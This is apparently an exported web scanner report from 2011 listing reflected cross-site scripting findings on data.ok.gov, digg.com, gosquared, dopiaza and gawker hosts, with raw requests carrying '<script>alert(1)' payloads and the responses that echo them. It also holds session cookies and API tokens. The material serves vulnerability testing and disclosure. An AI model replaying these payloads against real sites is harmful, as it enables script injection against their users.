| GET /flickr/badge.php?user Host: badge.dopiaza.org Proxy-Connection: keep-alive Referer: http://www.tn.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:44:38 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 Set-Cookie: PHPSESSID=0ea5122a4b Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Content-Type: text/javascript Content-Length: 2418 jsonp13041240499634b142<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.gosquared.com |
| Path: | /info |
| GET /info?a=GSN-237422-Wbb626<script>alert(1)< Host: data.gosquared.com Proxy-Connection: keep-alive Referer: http://www.mo.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: text/javascript Date: Sat, 30 Apr 2011 11:15:42 GMT Expires: Tue, 05 Apr 2011 11:15:42 Server: nginx/0.8.54 Connection: keep-alive Content-Length: 318 /* Error: line 36 in /var/www/shard/include [2] fopen(/var/log/gosquared /*** Error 402: We couldn't find any sites registered with account code or ID "GSN-237422-Wbb626<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/rdfTerms.json |
| GET /api/rdfTerms.json3e754<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public X-CSRF-Token: iR+NktWzrQ/EwlB20ldO X-Requested-With: XMLHttpRequest X-App-Token: U29jcmF0YS0td2VraWNrYXNz0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:22:55 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/rdfTerms.json3e754 Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 137 { "code" : "not_found", "error" : true, "message" : "No service for \"/rdfTerms.json3e754<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/views/35sq-wrr4 |
| GET /api/views7d8ba<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _blist_session_id=%7C |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:21:39 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views7d8ba<script>alert Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 154 { "code" : "not_found", "error" : true, "message" : "No service for \"/views7d8ba<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/views/35sq-wrr4 |
| GET /api/views/35sq-wrr419f3f<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _blist_session_id=%7C |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:21:41 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views/35sq-wrr419f3f Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 154 { "code" : "not_found", "error" : true, "message" : "No service for \"/views/35sq-wrr419f3f<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/views/35sq-wrr4 |
| GET /api/views/35sq-wrr4 Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _blist_session_id=%7C |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:21:42 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views/35sq-wrr4 Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 154 { "code" : "not_found", "error" : true, "message" : "No service for \"/views/35sq-wrr4 } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/views/35sq-wrr4 |
| GET /api/views/35sq-wrr4 Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _blist_session_id=%7C |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:21:38 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No snapshot at size thumb90e64<script>alert(1 Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 129 { "code" : "not_found", "error" : true, "message" : "No snapshot at size thumb90e64<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/views/dz4w-xbzm |
| GET /api/views405e8<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _blist_session_id=%7C |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:21:40 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views405e8<script>alert Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 154 { "code" : "not_found", "error" : true, "message" : "No service for \"/views405e8<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/views/dz4w-xbzm |
| GET /api/views/dz4w-xbzm6230f<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _blist_session_id=%7C |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:21:41 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views/dz4w-xbzm6230f Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 154 { "code" : "not_found", "error" : true, "message" : "No service for \"/views/dz4w-xbzm6230f<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/views/dz4w-xbzm |
| GET /api/views/dz4w-xbzm Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _blist_session_id=%7C |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:21:42 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views/dz4w-xbzm Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 154 { "code" : "not_found", "error" : true, "message" : "No service for \"/views/dz4w-xbzm } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/views/dz4w-xbzm |
| GET /api/views/dz4w-xbzm Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _blist_session_id=%7C |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:21:38 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No snapshot at size thumbd384b<script>alert(1 Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 129 { "code" : "not_found", "error" : true, "message" : "No snapshot at size thumbd384b<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/views/xxvf-kunf |
| GET /api/views86e9c<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _blist_session_id=%7C |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:21:40 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views86e9c<script>alert Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 154 { "code" : "not_found", "error" : true, "message" : "No service for \"/views86e9c<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/views/xxvf-kunf |
| GET /api/views/xxvf-kunf7d0d3<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _blist_session_id=%7C |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:21:41 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views/xxvf-kunf7d0d3 Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 154 { "code" : "not_found", "error" : true, "message" : "No service for \"/views/xxvf-kunf7d0d3<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/views/xxvf-kunf |
| GET /api/views/xxvf-kunf Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _blist_session_id=%7C |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:21:42 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views/xxvf-kunf Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 154 { "code" : "not_found", "error" : true, "message" : "No service for \"/views/xxvf-kunf } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /api/views/xxvf-kunf |
| GET /api/views/xxvf-kunf Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _blist_session_id=%7C |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:21:38 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No snapshot at size thumba2723<script>alert(1 Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 129 { "code" : "not_found", "error" : true, "message" : "No snapshot at size thumba2723<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /views.json |
| GET /views.json2d195<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public X-CSRF-Token: iR+NktWzrQ/EwlB20ldO X-Requested-With: XMLHttpRequest X-App-Token: U29jcmF0YS0td2VraWNrYXNz0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/json Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:23:01 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views.json2d195<script Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 134 { "code" : "not_found", "error" : true, "message" : "No service for \"/views.json2d195<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /views.json |
| GET /views.json?accessType Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public X-CSRF-Token: iR+NktWzrQ/EwlB20ldO X-Requested-With: XMLHttpRequest X-App-Token: U29jcmF0YS0td2VraWNrYXNz0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/json Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 |
| HTTP/1.1 400 Bad Request Date: Sat, 30 Apr 2011 11:22:59 GMT Server: Apache X-Error-Code: invalid_request X-Error-Message: Invalid Input: '220869e68f4<script>alert Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 133 { "code" : "invalid_request", "error" : true, "message" : "Invalid Input: '220869e68f4<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /views/INLINE/rows.json |
| POST /viewsadb9b<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public Origin: http://data.ok.gov X-CSRF-Token: iR+NktWzrQ/EwlB20ldO X-Requested-With: XMLHttpRequest X-App-Token: U29jcmF0YS0td2VraWNrYXNz0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/json Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 Content-Length: 3125 {"id":"dz4w-xbzm","name": ...[SNIP]... |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:23:21 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/viewsadb9b<script>alert Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 146 { "code" : "not_found", "error" : true, "message" : "No service for \"/viewsadb9b<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /views/INLINE/rows.json |
| POST /views/INLINEbd835<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public Origin: http://data.ok.gov X-CSRF-Token: iR+NktWzrQ/EwlB20ldO X-Requested-With: XMLHttpRequest X-App-Token: U29jcmF0YS0td2VraWNrYXNz0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/json Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 Content-Length: 3125 {"id":"dz4w-xbzm","name": ...[SNIP]... |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:23:23 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views/INLINEbd835 Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 146 { "code" : "not_found", "error" : true, "message" : "No service for \"/views/INLINEbd835<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /views/INLINE/rows.json |
| POST /views/INLINE/rows.json59df6<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public Origin: http://data.ok.gov X-CSRF-Token: iR+NktWzrQ/EwlB20ldO X-Requested-With: XMLHttpRequest X-App-Token: U29jcmF0YS0td2VraWNrYXNz0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/json Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 Content-Length: 3125 {"id":"dz4w-xbzm","name": ...[SNIP]... |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:23:25 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views/INLINE/rows Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 146 { "code" : "not_found", "error" : true, "message" : "No service for \"/views/INLINE/rows.json59df6<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /views/INLINE/rows.json |
| POST /views/INLINE/rows.json Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public Origin: http://data.ok.gov X-CSRF-Token: iR+NktWzrQ/EwlB20ldO X-Requested-With: XMLHttpRequest X-App-Token: U29jcmF0YS0td2VraWNrYXNz0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/json Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 Content-Length: 3125 {"id":"dz4w-xbzm","name": ...[SNIP]... |
| HTTP/1.1 400 Bad Request Date: Sat, 30 Apr 2011 11:23:16 GMT Server: Apache X-Error-Code: invalid_request X-Error-Message: Invalid Input: 'WEBSITE569be<script Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 134 { "code" : "invalid_request", "error" : true, "message" : "Invalid Input: 'WEBSITE569be<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /views/INLINE/rows.json |
| POST /views/INLINE/rows.json Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public Origin: http://data.ok.gov X-CSRF-Token: iR+NktWzrQ/EwlB20ldO X-Requested-With: XMLHttpRequest X-App-Token: U29jcmF0YS0td2VraWNrYXNz0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/json Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 Content-Length: 3125 {"id":"dz4w-xbzm","name": ...[SNIP]... |
| HTTP/1.1 400 Bad Request Date: Sat, 30 Apr 2011 11:23:20 GMT Server: Apache X-Error-Code: invalid_request X-Error-Message: Invalid Input: '1002dc0c<script>alert(1) Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 130 { "code" : "invalid_request", "error" : true, "message" : "Invalid Input: '1002dc0c<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /views/INLINE/rows.json |
| POST /views/INLINE/rows.json Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public Origin: http://data.ok.gov X-CSRF-Token: iR+NktWzrQ/EwlB20ldO X-Requested-With: XMLHttpRequest X-App-Token: U29jcmF0YS0td2VraWNrYXNz0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/json Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 Content-Length: 3125 {"id":"dz4w-xbzm","name": ...[SNIP]... |
| HTTP/1.1 400 Bad Request Date: Sat, 30 Apr 2011 11:23:18 GMT Server: Apache X-Error-Code: invalid_request X-Error-Message: Invalid Input: '0c08d2<script>alert(1)< Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 128 { "code" : "invalid_request", "error" : true, "message" : "Invalid Input: '0c08d2<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /views/dz4w-xbzm.json |
| GET /views47fae<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public X-CSRF-Token: iR+NktWzrQ/EwlB20ldO X-Requested-With: XMLHttpRequest X-App-Token: U29jcmF0YS0td2VraWNrYXNz0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/json Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:22:59 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views47fae<script>alert Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 144 { "code" : "not_found", "error" : true, "message" : "No service for \"/views47fae<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /views/dz4w-xbzm.json |
| GET /views/dz4w-xbzm.json15f5f<script>alert(1)< Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public X-CSRF-Token: iR+NktWzrQ/EwlB20ldO X-Requested-With: XMLHttpRequest X-App-Token: U29jcmF0YS0td2VraWNrYXNz0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/json Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 11:23:00 GMT Server: Apache X-Error-Code: not_found X-Error-Message: No service for "/views/dz4w-xbzm Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 144 { "code" : "not_found", "error" : true, "message" : "No service for \"/views/dz4w-xbzm.json15f5f<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /views/dz4w-xbzm.json |
| POST /views/dz4w-xbzm.json Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public Origin: http://data.ok.gov X-CSRF-Token: iR+NktWzrQ/EwlB20ldO X-Requested-With: XMLHttpRequest X-App-Token: U29jcmF0YS0td2VraWNrYXNz0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/json Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 Content-Length: 0 |
| HTTP/1.1 400 Bad Request Date: Sat, 30 Apr 2011 11:22:59 GMT Server: Apache X-Error-Code: invalid_request X-Error-Message: Invalid Input: 'WEBSITEdd487<script Vary: Accept-Encoding,User Connection: close Content-Type: application/json;charset Content-Length: 134 { "code" : "invalid_request", "error" : true, "message" : "Invalid Input: 'WEBSITEdd487<script>alert(1)< } |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /w/dz4w-xbzm/q69b-3vw6 |
| GET /w/dz4w-xbzm/q69b-3vw63e5d4%2527%253balert Host: data.ok.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: logged_in=; __utmz=120904477 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:20:49 GMT Server: Apache ETag: "5e71223ce2a2fc54bd7 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: logged_in=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: _blist_session_id=%7C Content-Length: 54893 Status: 200 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <!--[if lte IE 6]><html xmlns="http://www.w3.org ...[SNIP]... ":2,"display_name": blist.widget.customi blist.widget.enabled </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://digg.com |
| Path: | /submit |
| GET /submit%00c85df"><script>alert(1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:20:26 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 Cache-Control: no-cache,no-store,must Pragma: no-cache Set-Cookie: traffic_control= Set-Cookie: d=b60ad842c047fafa1d X-Digg-Time: D=990255 10.2.129.3 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 16976 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://fonts.gawker.com |
| Path: | /k/zvc4iwz-c-6179963-143 |
| GET /k8d230<script>alert(1)< Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: fonts.gawker.com |
| HTTP/1.1 404 Not Found Content-Type: text/plain Date: Sat, 30 Apr 2011 12:17:45 GMT Server: nginx/0.8.36 X-Runtime: 0.000716 Content-Length: 80 Not Found: /k8d230<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://fonts.gawker.com |
| Path: | /k/zvc4iwz-c-6179963-143 |
